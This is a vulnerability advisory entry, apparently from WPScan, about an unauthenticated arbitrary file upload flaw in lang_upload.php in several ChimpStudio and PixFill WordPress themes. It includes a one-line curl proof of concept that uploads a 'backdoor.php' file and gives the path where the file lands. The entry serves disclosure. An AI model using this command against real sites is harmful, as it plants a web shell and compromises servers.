Lucene search

K
wpvulndbJoshua SmallWPVDB-ID:9AB3D6CF-AAD7-41BC-9AAE-DC5313F12F7C
HistoryDec 29, 2022 - 12:00 a.m.

Multiple themes - Unauthenticated Arbitrary File Upload

2022-12-2900:00:00
Joshua Small
wpscan.com
42
multiple themes
authorization
upload validation
lang_upload.php
unauthenticated attacker
arbitrary files
web server
poc
malicious file
curl
website
software

EPSS

0.004

Percentile

73.1%

Multiple themes from ChimpStudio and PixFill does not have any authorisation and upload validation in the lang_upload.php file, allowing any unauthenticated attacker to upload arbitrary files to the web server.

PoC

Create a malicious file “backdoor.php”, then curl https://website.com/wp-content/themes/westand/include/lang_upload.php -F “mofile[][email protected]” The file will be at https://example.com/wp-content/themes/westand/languages/backdoor.php

EPSS

0.004

Percentile

73.1%

Related for WPVDB-ID:9AB3D6CF-AAD7-41BC-9AAE-DC5313F12F7C